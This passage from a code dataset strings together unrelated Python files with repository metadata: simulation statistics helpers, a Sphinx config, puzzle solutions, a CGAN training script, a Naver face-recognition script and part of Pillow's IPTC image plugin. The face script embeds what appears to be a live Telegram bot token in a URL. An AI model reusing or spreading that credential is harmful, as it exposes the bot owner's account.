def get_variable_min(self, var_name: str, domain: str = 'step') -> Union[np.ndarray, float]:
    """
    Calculates the minimum of a variable.

    The 0-axis indexes are the domain values (step indexes or subsim indexes).

    :param var_name: Variable name.
    :type var_name: str
    :param domain: If domain='step', a minimum for each step is calculated; if domain='subsim', a minimum for each subsimulation is calculated, and if domain=None, the overall minimum is calculated, defaults to 'step'
    :type domain: str, optional
    :return: An array with a minimum for each domain value (step or subsim), or an overall minimum.
    :rtype: Union[np.ndarray, float]
    """
    assert isinstance(var_name, str), 'var_name must be string.'
    assert domain in ('step', 'subsim', None), 'domain must be \'step\', \'subsim\' or None.'
    found_name, found_type, found_default = _first_or_default(self._variables, lambda t: t[0] == var_name, (None, None, None))
    assert isinstance(found_name, str), f'Variable {var_name} does not exists.'
    assert found_type in (float, int, bool), 'Variable type must be int, float or bool.'
    hist = [env.get_variable_numpy_history(var_name) for env in self._subsim_envs]
    # np.float was removed in NumPy 1.24; builtin float keeps the same dtype.
    if domain is None:
        return np.min(hist).astype(float)
    return np.min(hist, axis=0 if domain == 'step' else 1).astype(float)
def get_variable_max(self, var_name: str, domain: str = 'step') -> Union[np.ndarray, float]:
    """
    Calculates the maximum of a variable.

    The 0-axis indexes are the domain values (step indexes or subsim indexes).

    :param var_name: Variable name.
    :type var_name: str
    :param domain: If domain='step', a maximum for each step is calculated; if domain='subsim', a maximum for each subsimulation is calculated, and if domain=None, the overall maximum is calculated, defaults to 'step'
    :type domain: str, optional
    :return: An array with a maximum for each domain value (step or subsim), or an overall maximum.
    :rtype: Union[np.ndarray, float]
    """
    assert isinstance(var_name, str), 'var_name must be string.'
    assert domain in ('step', 'subsim', None), 'domain must be \'step\', \'subsim\' or None.'
    found_name, found_type, found_default = _first_or_default(self._variables, lambda t: t[0] == var_name, (None, None, None))
    assert isinstance(found_name, str), f'Variable {var_name} does not exists.'
    assert found_type in (float, int, bool), 'Variable type must be int, float or bool.'
    hist = [env.get_variable_numpy_history(var_name) for env in self._subsim_envs]
    # np.float was removed in NumPy 1.24; builtin float keeps the same dtype.
    if domain is None:
        return np.max(hist).astype(float)
    return np.max(hist, axis=0 if domain == 'step' else 1).astype(float)
def get_variable_sum(self, var_name: str, domain: str = 'step') -> Union[np.ndarray, float]:
    """
    Calculates the sum of a variable.

    The 0-axis indexes are the domain values (step indexes or subsim indexes).

    :param var_name: Variable name.
    :type var_name: str
    :param domain: If domain='step', a sum for each step is calculated; if domain='subsim', a sum for each subsimulation is calculated, and if domain=None, the overall sum is calculated, defaults to 'step'
    :type domain: str, optional
    :return: An array with a sum for each domain value (step or subsim), or an overall sum.
    :rtype: Union[np.ndarray, float]
    """
    assert isinstance(var_name, str), 'var_name must be string.'
    assert domain in ('step', 'subsim', None), 'domain must be \'step\', \'subsim\' or None.'
    found_name, found_type, found_default = _first_or_default(self._variables, lambda t: t[0] == var_name, (None, None, None))
    assert isinstance(found_name, str), f'Variable {var_name} does not exists.'
    assert found_type in (float, int, bool), 'Variable type must be int, float or bool.'
    hist = [env.get_variable_numpy_history(var_name) for env in self._subsim_envs]
    # np.float was removed in NumPy 1.24; builtin float keeps the same dtype.
    if domain is None:
        return np.sum(hist).astype(float)
    return np.sum(hist, axis=0 if domain == 'step' else 1).astype(float)
def get_variable_histogram(self, var_name: str, n_bins: int, density: bool = False, _range: Union[Tuple[float, float], None] = None) -> np.ndarray:
    """Returns an array with a histogram of the variable for each step of the simulation.

    The 0-axis indexes are the steps; the 1-axis indexes are the bins.

    :param var_name: Variable name.
    :type var_name: str
    :param n_bins: Number of bins per histogram.
    :type n_bins: int
    :param density: Set to true so histograms are density instead of counts. defaults to False
    :type density: bool, optional
    :param _range: defines manually the range (min, max) of the histogram. Default to None.
    :type _range: Union[Tuple[float, float], None], optional
    :return: Array of histograms.
    :rtype: np.ndarray
    """
    assert isinstance(var_name, str), 'var_name must be string.'
    assert isinstance(n_bins, int), 'n_bins must be int.'
    assert n_bins >= 1, 'n_bins must be greater than 0.'
    found_name, found_type, found_default = _first_or_default(self._variables, lambda t: t[0] == var_name, (None, None, None))
    assert isinstance(found_name, str), f'Variable {var_name} does not exists.'
    assert found_type in (float, int, bool), 'Variable type must be int, float or bool.'
    vhistories = np.array([env.get_variable_numpy_history(var_name) for env in self._subsim_envs])
    # Use the user-supplied range when given, otherwise span the observed data.
    if _range is None:
        vmin, vmax = np.min(vhistories), np.max(vhistories)
    else:
        vmin, vmax = _range[0], _range[1]
    vhistogram = [
        np.histogram(vhistories[:, i], bins=n_bins, range=(vmin, vmax), density=density)[0]
        for i in range(vhistories.shape[1])
    ]
    # np.float was removed in NumPy 1.24; builtin float keeps the same dtype.
    return np.array(vhistogram).astype(float)
def get_variable_histories(self, var_name: str) -> np.ndarray:
    """Returns an array with all the outcomes that a variable had throughout the simulation.

    The 0-axis indices are the subsimulations and the 1-axis indices are the steps.

    :param var_name: Variable name.
    :type var_name: str
    :return: Array with the outcomes of the variable.
    :rtype: np.ndarray
    """
    assert isinstance(var_name, str), 'var_name must be string.'
    found_name, found_type, found_default = _first_or_default(self._variables, lambda t: t[0] == var_name, (None, None, None))
    assert isinstance(found_name, str), f'Variable {var_name} does not exists.'
    hist = [env.get_variable_numpy_history(var_name) for env in self._subsim_envs]
    # np.float was removed in NumPy 1.24; builtin float keeps the same dtype.
    return np.array(hist).astype(float)
| [
"filipe.ferraz0@gmail.com"
] | filipe.ferraz0@gmail.com |
b9edcccc00c10227f91be8740e4d744c0cea4347 | 2b8047e9e73a2f6fd43897cff19cb7e7c7c464d4 | /docssrc/source/conf.py | 5d48fbeb3fa4a5a1f8afc2bbac54d3f8fcfb3638 | [
"MIT"
] | permissive | Peilonrayz/envee | 548fe08330a3b43bee5da1d64a0e406c781b990e | 66f5b6b1ff7f5966be794e1e3878418c560c1f65 | refs/heads/master | 2021-01-09T13:35:40.946529 | 2020-02-21T20:58:27 | 2020-02-21T20:58:27 | 242,321,085 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 984 | py | import datetime
import pathlib
import sys
try:
import ConfigParser as configparser
except ImportError:
import configparser
# Sphinx configuration for the `envee` documentation build.
FILE_PATH = pathlib.Path(__file__).absolute()
# Add documentation for tests
TLD = FILE_PATH.parent.parent.parent  # repository top-level directory
sys.path.insert(0, str(TLD))  # make the package importable for autodoc

# Project version is read from setup.cfg rather than duplicated here.
config = configparser.ConfigParser()
config.read(TLD / "setup.cfg")

project = "envee"
author = "Peilonrayz"
copyright = f"{datetime.datetime.now().year}, {author}"
release = config.get("src", "version")

master_doc = "index"
templates_path = ["_templates"]
exclude_patterns = []

# Code prepended to every doctest's namespace.
doctest_global_setup = f"""
import {project}
"""

extensions = [
    "sphinx.ext.autodoc",
    "sphinx.ext.doctest",
    "sphinx.ext.graphviz",
    "sphinx.ext.githubpages",
    "sphinx.ext.intersphinx",
    "sphinx_autodoc_typehints",
    "sphinx_rtd_theme",
]

intersphinx_mapping = {"python": ("https://docs.python.org/3", None)}

html_theme = "sphinx_rtd_theme"
html_static_path = ["_static"]
# sphinx_autodoc_typehints option: evaluate imports guarded by TYPE_CHECKING.
set_type_checking_flag = True
"peilonrayz@gmail.com"
] | peilonrayz@gmail.com |
fbdea07de6f18420b99a57b116c79adf1f0463a1 | eac52a8ae7c539acedaedf8744bd8e20172f0af6 | /general/decode_ways.py | 33c70cc775b271c21d0bb448684acae24e9ffa65 | [] | no_license | mshekhar/random-algs | 3a0a0f6e6b21f6a59ed5e1970b7a2bc2044e191f | 7c9a8455f49027a754038b23aaa2df61fe5397ca | refs/heads/master | 2020-03-26T16:29:42.694785 | 2019-07-18T20:57:55 | 2019-07-18T20:57:55 | 145,105,593 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,895 | py | # A message containing letters from A-Z is being encoded to numbers using the following mapping:
#
# 'A' -> 1
# 'B' -> 2
# ...
# 'Z' -> 26
# Given a non-empty string containing only digits, determine the total number of ways to decode it.
#
# Example 1:
#
# Input: "12"
# Output: 2
# Explanation: It could be decoded as "AB" (1 2) or "L" (12).
# Example 2:
#
# Input: "226"
# Output: 3
# Explanation: It could be decoded as "BZ" (2 26), "VF" (22 6), or "BBF" (2 2 6).
# if not single_digit:
# all_single_possible[c] = False
# else:
# all_single_possible[c] = all_single_possible[c - 1] and all_single_possible[c]
# if c - 1 >= 0 and num_decodings[c - 1] > 0:
# num_decodings[c] = num_decodings[c - 1]
#
# if c - 1 >= 0:
# double_digit = self.get_decoding_count(s[c - 1] + i)
# if double_digit:
# print s[c - 1] + i, double_digit, num_decodings[c - 2] + int(all_single_possible[c - 2])
# if c - 2 >= 0 and num_decodings[c - 2] + int(all_single_possible[c - 2]) > 0:
# num_decodings[c] += num_decodings[c - 2] + 1
# elif c == 1:
# num_decodings[c] += 1
class Solution(object):
    """Count decodings of a digit string under the mapping 'A'->1 ... 'Z'->26."""

    def get_decoding_count(self, s):
        """Return 1 if ``s`` is a valid letter code (1-26, no leading zero), else 0."""
        if not s.startswith('0') and 1 <= int(s) <= 26:
            return 1
        return 0

    def numDecodings(self, s):
        """
        :type s: str
        :rtype: int
        """
        # The original implementation indexed num_decodings[-1] and crashed on "".
        if not s:
            return 0
        # Rolling DP over positions: prev2/prev1 hold the number of decodings of
        # the prefixes ending two and one characters back (empty prefix -> 1 way).
        prev2, prev1 = 1, self.get_decoding_count(s[0])
        for c in range(1, len(s)):
            current = 0
            if self.get_decoding_count(s[c]):           # take s[c] as a 1-digit code
                current += prev1
            if self.get_decoding_count(s[c - 1:c + 1]):  # take s[c-1:c+1] as a 2-digit code
                current += prev2
            prev2, prev1 = prev1, current
        return prev1
# Ad-hoc smoke tests (Python 2 print statements). The trailing number on each
# line is the author's expected decode count.
# NOTE(review): the expectation for "10323" looks wrong -- "10 3 2 3" and
# "10 3 23" are both valid, so the correct count is 2, not 1.
print Solution().numDecodings("12"), 2
print Solution().numDecodings("226"), 3
print Solution().numDecodings("10"), 1
print Solution().numDecodings("103"), 1
print Solution().numDecodings("1032"), 1
print Solution().numDecodings("10323"), 1
print Solution().numDecodings("012"), 0
print Solution().numDecodings("110"), 1
print Solution().numDecodings("1212"), 5
# Hand-written enumerations of the decodings behind the expectations above.
# 1 2 1
# 12 1
# 1 21
#
# 1 2 1 2
#
# 12 1 2
# 12 12
#
# 1 21 2
# 1 2 12
# for i in ["0", "10", "10", "103", "1032", "10323"]:
#     print(Solution().numDecodings(i))
| [
"mayank@moengage.com"
] | mayank@moengage.com |
0a5f6df39a2d3620f087deaf1e129653f22361bc | 73983c84160d74cf16504b255c9b91ec90c1d8da | /python/lintcode/1751.CowherdWeaver.py | 371aa2dee601416aa707782507f9adb391f241b0 | [] | no_license | kaka-go/Programming | 53ac72e08dc16a3ce76aba142265e9231f75e33f | 32255576bc80155cfef302ee1985e203e20e0f22 | refs/heads/master | 2022-10-24T21:19:43.989085 | 2020-06-16T13:56:44 | 2020-06-16T13:56:44 | 11,860,358 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,665 | py | # 1751. Cowherd&Weaver
# cat-only-icon
# CAT Only
# 中文English
# On the Qixi Festival, the Cowherd and the Weaver play together in a maze size of n*m . However, they get separated from each other. Now given the maze consisting of .,*,S,T, where . denotes an empty space, * denotes an obstacle, S denotes the position of the cowherd, T denotes the position of the weaver, the Cowherd and the Weaver will try to find each other(they can move to the grid up or down or left or right or stand still, but they can't walk outside of the maze or move to obstacles).Is it possible for them reunion? If possible, return True, otherwise return False.
# Example
# Example 1:
# Input:
# [
# "S..*",
# "*.**",
# "...T"
# ]
# Output: true
# Explanation:
# weaver don't need to move
# Cowherd's route:(0,0)->(0,1)->(1,1)->(2,1)->(2,2)->(2,3)
# Example 2:
# Input:
# [
# "S..*",
# "***.",
# "...T"
# ]
# Output: false
# Explanation
# It is impossible for them to reunion
# Notice
# 2<=n,m<=1000
class Solution:
    """
    @param maze: the maze
    @return: Can they reunion?
    """
    # Kept for interface compatibility; findHer() re-initializes them per call.
    N, M = 0, 0
    visited = set()
    MAZE = None

    def findHer(self, maze):
        """Return True if T is reachable from S moving up/down/left/right
        through '.' cells ('*' are obstacles)."""
        self.N = len(maze)
        self.M = len(maze[0])
        self.MAZE = [list(row) for row in maze]
        self.visited = set()
        s_pos = (0, 0)
        t_pos = (0, 0)
        for row in range(self.N):
            for col in range(self.M):
                if maze[row][col] == 'S':
                    s_pos = (row, col)
                if maze[row][col] == 'T':
                    t_pos = (row, col)
        return self.dfs(maze, s_pos, t_pos)

    def is_valid(self, x, y):
        # (x, y) is (column, row) -- note the reversed argument order.
        return 0 <= x < self.M and 0 <= y < self.N

    def dfs(self, maze, pos, target):
        """Iterative depth-first search from pos to target.

        The original recursive version overflowed Python's recursion limit on
        the stated input bound (mazes up to 1000x1000); an explicit stack keeps
        memory bounded. Debug printing was removed.
        """
        stack = [pos]
        self.visited.add(pos)
        while stack:
            current = stack.pop()
            if current == target:
                return True
            y, x = current
            for dy, dx in ((-1, 0), (0, -1), (1, 0), (0, 1)):
                nxt = (y + dy, x + dx)
                if nxt in self.visited:
                    continue
                if self.is_valid(nxt[1], nxt[0]) and maze[nxt[0]][nxt[1]] != '*':
                    self.visited.add(nxt)
                    stack.append(nxt)
        return False
# Ad-hoc manual check of the maze search (result was inspected via the
# debug printing inside the class).
s = Solution()
s.findHer(
    [
        ".........T...*",
        "**.*..........",
        "........**....",
        "S*.**........."
    ]
)
| [
"edward9145@gmail.com"
] | edward9145@gmail.com |
9bd94aa5bacee387781973b3baf0c5402378758e | 5b34f91f66b34ced0f51726f5c8f26017614423a | /0817/score.py | 5cc455de775ed199e1b5de3f378114d49be6c38c | [] | no_license | WinstonHou/Phython200817 | 40cec9a587fa55c3ecdc52f426b11f95acf8060f | 923a0f0b90e44310769563256a3fa1f11d514c4b | refs/heads/master | 2022-11-29T16:36:37.390898 | 2020-08-17T08:53:37 | 2020-08-17T08:53:37 | 288,129,852 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 330 | py | score=int(input("請輸入成績"))
# Map a 0-100 score to a letter grade: A >= 90, B >= 80, C >= 70, D >= 60,
# E otherwise; anything outside 0-100 is rejected as invalid input.
# `score` is read from stdin on the preceding line.
if score >=0 and score<=100:
    if score>=90:
        print("等級A")  # grade A
    elif score>=80:
        print("等級B")  # grade B
    elif score>=70:
        print("等級C")  # grade C
    elif score>=60:
        print("等級D")  # grade D
    else:
        print("等級E")  # grade E
else: print("輸入錯誤!")  # invalid input
| [
"noreply@github.com"
] | noreply@github.com |
f0b3e6949b78c44d35bdedc65dcdd7d848eae7f3 | 54f352a242a8ad6ff5516703e91da61e08d9a9e6 | /Source Codes/CodeJamData/10/33/17.py | b549582d467c3879831e6f099d36ecf18d3abe31 | [] | no_license | Kawser-nerd/CLCDSA | 5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb | aee32551795763b54acb26856ab239370cac4e75 | refs/heads/master | 2022-02-09T11:08:56.588303 | 2022-01-26T18:53:40 | 2022-01-26T18:53:40 | 211,783,197 | 23 | 9 | null | null | null | null | UTF-8 | Python | false | false | 1,617 | py | from itertools import count
def board(rows):
    """Decode hex-digit rows into a matrix of 0/1 bits (4 bits per hex digit).

    NOTE(review): Python 2 file -- map() returns a list there; under Python 3
    this would produce one-shot map iterators instead.
    """
    n = len(rows[0]) * 4
    return [map(int, '{0:0{1}b}'.format(int(row, 16), n)) for row in rows]
def squares(board):
    """Yield (size, -row, -col) for the largest checkerboard square anchored at
    every cell not yet consumed (cells marked 2 are skipped).

    Row and column are negated so that max() over the yielded tuples prefers
    the top-left-most square among equally sized candidates.
    """
    m, n = len(board), len(board[0])
    #sq = {}
    for r in xrange(m):  # Python 2 (xrange)
        for c in xrange(n):
            if board[r][c] == 2: continue
            ns = findsquare(board, r, c)
            yield ns, -r, -c
            #fill(board, r, c, ns)
            #sq[ns] = sq.get(ns, 0) + 1
    #return sq
def solve(board):
    """Greedily carve out the largest remaining checkerboard square until the
    board is exhausted; return {square_size: count}.
    """
    result = {}
    m, n = len(board), len(board[0])
    while 1:
        try:
            # max() raises ValueError once squares() yields nothing -- done.
            # NOTE(review): rebinds n (the board width) to the square size;
            # harmless because n is not used afterwards, but confusing.
            n, r, c = max(squares(board))
        except ValueError:
            return result
        result[n] = result.get(n, 0) + 1
        fill(board, -r, -c, n)  # undo the negation applied by squares()
def fill(board, r, c, n):
    """Mark the n x n square with top-left corner (r, c) as consumed (value 2)."""
    for i in xrange(r, r+n):  # Python 2 (xrange)
        for j in xrange(c, c+n):
            board[i][j] = 2
def findsquare(board, r, c):
    """Return the side length of the largest checkerboard-patterned square
    whose top-left corner is (r, c).

    Grows the square one ring at a time: for candidate size s+1 it walks the
    new bottom row left-to-right, then the new right column bottom-to-top,
    alternating the expected color at each step. A color mismatch returns the
    current size s; running off the board edge (IndexError) does the same.
    """
    x = board[r][c]
    try:
        for s in count(1):
            for j in range(c, c+s+1):
                x = 1 - x  # expected color alternates along the walk
                if board[r+s][j] != x:
                    return s
            for i in range(r+s-1, r-1, -1):
                x = 1 - x
                if board[i][c+s] != x:
                    return s
    except IndexError:
        return s
if __name__ == '__main__':
    # Google Code Jam driver (Python 2): first line is the case count, then
    # each case is "M N" followed by M rows of hex digits.
    import sys
    rl = iter(sys.stdin).next  # Python 2 iterator protocol
    for case in range(1, int(rl())+1):
        M,N = map(int, rl().split())
        lines = [rl().strip() for _ in range(M)]
        b = board(lines)
        sq = solve(b)
        # Output: number of distinct square sizes, then "size count" pairs
        # in decreasing size order.
        print 'Case #%d: %s' % (case, len(sq))
        for k, v in sorted(sq.items(), reverse=True):
            print k,v
| [
"kwnafi@yahoo.com"
] | kwnafi@yahoo.com |
a20abcac99856f482d5e3f7ec4d5c5c93878dacd | 98f505e8275ed888818d8d6f77d27a9c275b55d8 | /face.py | a6d86359d258eda63f01fe71ba8a00892e28e706 | [] | no_license | EHwooKim/telegram | 13ac0afbd4ee5f91aa81b557183e9d8143fb1315 | 034ae64fa6283720fd55362b1b763cb3497ce4fc | refs/heads/master | 2022-12-11T19:53:23.942523 | 2019-07-12T07:41:29 | 2019-07-12T07:41:29 | 196,533,974 | 0 | 0 | null | 2022-12-08T05:52:25 | 2019-07-12T07:48:30 | Python | UTF-8 | Python | false | false | 959 | py | import pprint
import requests
from decouple import config

# 0. Download the photo from the Telegram bot file URL.
file_url = 'https://api.telegram.org/file/bot823224197:AAFwM03Ie4P8dBH45aKI75sMO0okZpcIqic/photos/file_2.jpg'
response = requests.get(file_url, stream=True)
image = response.raw.read()

# 1. Naver API credentials (read from the environment via python-decouple).
naver_client_id = config('NAVER_CLIENT_ID')
naver_client_secret = config('NAVER_CLIENT_SECRET')

# 2. Naver celebrity face-recognition endpoint.
naver_url = 'https://openapi.naver.com/v1/vision/celebrity'

# 3. POST the image for recognition.
headers = {
    'X-Naver-Client-Id': naver_client_id,
    'X-Naver-Client-Secret': naver_client_secret
}
response = requests.post(naver_url,
                         headers=headers,
                         files={'image':image}).json()
# Take the top celebrity match for the first detected face; report it only
# above a 20% confidence threshold. (User-facing Korean strings unchanged:
# "you look X% like <celebrity>" / "not a person".)
best = response.get('faces')[0].get('celebrity')
if best.get('confidence') > 0.2:
    text = f"{best.get('confidence')*100}%만큼 {best.get('value')}를 닮으셨네요~"
else :
    text = '사람이 아닙니다'
print(text) | [
"ehwoo0707@naver.com"
] | ehwoo0707@naver.com |
9b0cd6014bdec03a0d2afed288972c3c237370e2 | bbc9cae586607079ce8a469b7436603f174ffcb5 | /cgan.py | bcbd9e769bf30dafe76a9d6a62b2bf7e04b46126 | [] | no_license | howieeeeeeee/tensorflow_GANs | aafcce16512a5a052b92e4be048ce2ddd24e7472 | 0e678807650bf5ac3f279c74602ffe8292e93e2d | refs/heads/master | 2021-05-14T16:02:52.215214 | 2018-01-05T07:18:07 | 2018-01-05T07:18:07 | 116,010,493 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,804 | py | # -*- coding: utf-8 -*-
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import os
# Load MNIST (TF1-style, one-hot labels) and define network hyper-parameters.
mnist = input_data.read_data_sets('MNIST_data', one_hot=True)

mb_size = 64                           # minibatch size
Z_dim = 100                            # noise vector dimension
X_dim = mnist.train.images.shape[1]    # flattened image size (784)
y_dim = mnist.train.labels.shape[1]    # number of classes (10)
h_dim = 128                            # hidden layer width
def xavier_init(size):
    """Sample an initial weight tensor of the given shape with Xavier/Glorot
    scaling (stddev = 1 / sqrt(fan_in / 2))."""
    in_dim = size[0]
    xavier_stddev = 1. / tf.sqrt(in_dim / 2.)
    return tf.random_normal(shape=size, stddev=xavier_stddev)
""" Discriminator Net model """
X = tf.placeholder(tf.float32, shape=[None, 784])
y = tf.placeholder(tf.float32, shape=[None, y_dim])
D_W1 = tf.Variable(xavier_init([X_dim + y_dim, h_dim]))
D_b1 = tf.Variable(tf.zeros(shape=[h_dim]))
D_W2 = tf.Variable(xavier_init([h_dim, 1]))
D_b2 = tf.Variable(tf.zeros(shape=[1]))
theta_D = [D_W1, D_W2, D_b1, D_b2]
def discriminator(x, y):
    """One-hidden-layer conditional discriminator.

    Concatenates image x with label y and returns (sigmoid probability,
    raw logit) of the input being real.
    """
    inputs = tf.concat(axis=1, values=[x, y])
    D_h1 = tf.nn.relu(tf.matmul(inputs, D_W1) + D_b1)
    D_logit = tf.matmul(D_h1, D_W2) + D_b2
    D_prob = tf.nn.sigmoid(D_logit)
    return D_prob, D_logit
""" Generator Net model """
Z = tf.placeholder(tf.float32, shape=[None, Z_dim])
G_W1 = tf.Variable(xavier_init([Z_dim + y_dim, h_dim]))
G_b1 = tf.Variable(tf.zeros(shape=[h_dim]))
G_W2 = tf.Variable(xavier_init([h_dim, X_dim]))
G_b2 = tf.Variable(tf.zeros(shape=[X_dim]))
theta_G = [G_W1, G_W2, G_b1, G_b2]
def generator(z, y):
    """One-hidden-layer conditional generator.

    Concatenates noise z with label y and returns a sigmoid-activated
    flattened image in [0, 1].
    """
    inputs = tf.concat(axis=1, values=[z, y])
    G_h1 = tf.nn.relu(tf.matmul(inputs, G_W1) + G_b1)
    G_log_prob = tf.matmul(G_h1, G_W2) + G_b2
    G_prob = tf.nn.sigmoid(G_log_prob)
    return G_prob
def sample_Z(m, n):
    """Draw an (m, n) matrix of noise samples, i.i.d. uniform on [-1, 1)."""
    low, high = -1., 1.
    return np.random.uniform(low, high, size=[m, n])
def plot(samples):
    """Render up to 16 flattened 28x28 samples on a 4x4 grayscale grid and
    return the matplotlib figure."""
    fig = plt.figure(figsize=(4, 4))
    gs = gridspec.GridSpec(4, 4)
    gs.update(wspace=0.05, hspace=0.05)

    for i, sample in enumerate(samples):
        ax = plt.subplot(gs[i])
        plt.axis('off')
        ax.set_xticklabels([])
        ax.set_yticklabels([])
        ax.set_aspect('equal')
        plt.imshow(sample.reshape(28, 28), cmap='Greys_r')

    return fig
# Assemble the conditional-GAN graph: one generated sample plus the
# discriminator's opinion on real and fake inputs.
G_sample = generator(Z, y)
D_real, D_logit_real = discriminator(X, y)
D_fake, D_logit_fake = discriminator(G_sample, y)

# Discriminator loss: push real logits toward 1 and fake logits toward 0.
D_loss_real = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=D_logit_real, labels=tf.ones_like(D_logit_real)))
D_loss_fake = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=D_logit_fake, labels=tf.zeros_like(D_logit_fake)))
D_loss = D_loss_real + D_loss_fake
# Generator loss (non-saturating): make the discriminator call fakes real.
G_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=D_logit_fake, labels=tf.ones_like(D_logit_fake)))

# Each optimizer only updates its own network's parameters.
D_solver = tf.train.AdamOptimizer().minimize(D_loss, var_list=theta_D)
G_solver = tf.train.AdamOptimizer().minimize(G_loss, var_list=theta_G)

sess = tf.Session()
sess.run(tf.global_variables_initializer())

if not os.path.exists('out/'):
    os.makedirs('out/')

i = 0

for it in range(1000000):
    # Every 1000 iterations, save a 4x4 grid of samples conditioned on digit 5.
    if it % 1000 == 0:
        n_sample = 16

        Z_sample = sample_Z(n_sample, Z_dim)
        y_sample = np.zeros(shape=[n_sample, y_dim])
        y_sample[:, 5] = 1  # condition every sample on the class "5"

        samples = sess.run(G_sample, feed_dict={Z: Z_sample, y:y_sample})

        fig = plot(samples)
        plt.savefig('out/{}.png'.format(str(i).zfill(3)), bbox_inches='tight')
        i += 1
        plt.close(fig)

    # Alternate one discriminator step and one generator step per minibatch.
    X_mb, y_mb = mnist.train.next_batch(mb_size)

    Z_sample = sample_Z(mb_size, Z_dim)
    _, D_loss_curr = sess.run([D_solver, D_loss], feed_dict={X: X_mb, Z: Z_sample, y:y_mb})
    _, G_loss_curr = sess.run([G_solver, G_loss], feed_dict={Z: Z_sample, y:y_mb})

    if it % 1000 == 0:
        print('Iter: {}'.format(it))
        print('D loss: {:.4}'. format(D_loss_curr))
        print('G_loss: {:.4}'.format(G_loss_curr))
        print()
"332897864@qq.com"
] | 332897864@qq.com |
5613be8e39c81aef65ec60ef432167af18caae0d | 6e22c9bc6dd2bb442345a1c6759249fc3211322b | /venv/lib/python3.8/site-packages/PIL/IptcImagePlugin.py | 1be000c7d32695eefd3bd31b691a4c32a85ae422 | [] | no_license | Sankalpa830/NHPE | b4ba283f602b15a2ae53afaeb06ed11354879f76 | ac2615f218d35bd0d8a24b06abb37ef77d321a72 | refs/heads/main | 2023-07-14T20:58:14.639187 | 2021-09-01T08:03:27 | 2021-09-01T08:03:27 | 401,979,352 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,961 | py | #
# The Python Imaging Library.
# $Id$
#
# IPTC/NAA file handling
#
# history:
# 1995-10-01 fl Created
# 1998-03-09 fl Cleaned up and added to PIL
# 2002-06-18 fl Added getiptcinfo helper
#
# Copyright (c) Secret Labs AB 1997-2002.
# Copyright (c) Fredrik Lundh 1995.
#
# See the README file for information on usage and redistribution.
#
import os
import tempfile
from . import Image, ImageFile
from ._binary import i8
from ._binary import i16be as i16
from ._binary import i32be as i32
from ._binary import o8
# IPTC DataSet 3:120 compression codes, and a 4-byte zero pad used when
# interpreting short byte strings as big-endian integers.
COMPRESSION = {1: "raw", 5: "jpeg"}
PAD = o8(0) * 4
#
# Helpers
def i(c):
    """Interpret the (up to four) trailing bytes of *c* as a big-endian
    32-bit integer, left-padding with zero bytes when shorter."""
    padded = (PAD + c)[-4:]
    return i32(padded)
def dump(c):
    """Print the bytes of *c* as space-separated two-digit hex values."""
    for byte in c:
        print("%02x" % i8(byte), end=" ")
    print()
##
# Image plugin for IPTC/NAA datastreams. To read IPTC/NAA fields
# from TIFF and JPEG files, use the <b>getiptcinfo</b> function.
class IptcImageFile(ImageFile.ImageFile):
    """Image plugin for IPTC/NAA datastreams.

    To read IPTC/NAA fields from TIFF and JPEG files, use getiptcinfo().
    """

    format = "IPTC"
    format_description = "IPTC/NAA"

    def getint(self, key):
        # Interpret the stored field value for *key* as a big-endian integer.
        return i(self.info[key])

    def field(self):
        #
        # get a IPTC field header: 0x1C marker, record, dataset, 2-byte size
        s = self.fp.read(5)
        if not len(s):
            return None, 0

        tag = i8(s[1]), i8(s[2])

        # syntax
        if i8(s[0]) != 0x1C or tag[0] < 1 or tag[0] > 9:
            raise SyntaxError("invalid IPTC/NAA file")

        # field size
        size = i8(s[3])
        if size > 132:
            raise OSError("illegal field length in IPTC/NAA file")
        elif size == 128:
            size = 0
        elif size > 128:
            # extended length: the next (size - 128) bytes hold the real size
            size = i(self.fp.read(size - 128))
        else:
            size = i16(s[3:])

        return tag, size

    def _open(self):
        # load descriptive fields until the image-data marker (8, 10)
        while True:
            offset = self.fp.tell()
            tag, size = self.field()
            if not tag or tag == (8, 10):
                break
            if size:
                tagdata = self.fp.read(size)
            else:
                tagdata = None
            # repeated tags accumulate their values into a list
            if tag in self.info:
                if isinstance(self.info[tag], list):
                    self.info[tag].append(tagdata)
                else:
                    self.info[tag] = [self.info[tag], tagdata]
            else:
                self.info[tag] = tagdata

        # mode: derived from DataSet 3:60 (layers/component) and 3:65 (band id)
        layers = i8(self.info[(3, 60)][0])
        component = i8(self.info[(3, 60)][1])
        if (3, 65) in self.info:
            id = i8(self.info[(3, 65)][0]) - 1
        else:
            id = 0
        if layers == 1 and not component:
            self.mode = "L"
        elif layers == 3 and component:
            self.mode = "RGB"[id]
        elif layers == 4 and component:
            self.mode = "CMYK"[id]

        # size: DataSet 3:20 (width) and 3:30 (height)
        self._size = self.getint((3, 20)), self.getint((3, 30))

        # compression
        try:
            compression = COMPRESSION[self.getint((3, 120))]
        except KeyError as e:
            raise OSError("Unknown IPTC image compression") from e

        # tile: image data starts at the (8, 10) field found above
        if tag == (8, 10):
            self.tile = [
                ("iptc", (compression, offset), (0, 0, self.size[0], self.size[1]))
            ]

    def load(self):
        if len(self.tile) != 1 or self.tile[0][0] != "iptc":
            return ImageFile.ImageFile.load(self)

        type, tile, box = self.tile[0]

        encoding, offset = tile

        self.fp.seek(offset)

        # Copy image data to temporary file
        o_fd, outfile = tempfile.mkstemp(text=False)
        # NOTE(review): os.fdopen() defaults to mode "r"; the writes below look
        # like they need a writable (binary, for jpeg payloads) mode -- confirm
        # against upstream Pillow, which later changed this code path.
        o = os.fdopen(o_fd)
        if encoding == "raw":
            # To simplify access to the extracted file,
            # prepend a PPM header
            o.write("P5\n%d %d\n255\n" % self.size)
        # concatenate every (8, 10) data field into the temporary file
        while True:
            type, size = self.field()
            if type != (8, 10):
                break
            while size > 0:
                s = self.fp.read(min(size, 8192))
                if not s:
                    break
                o.write(s)
                size -= len(s)
        o.close()

        try:
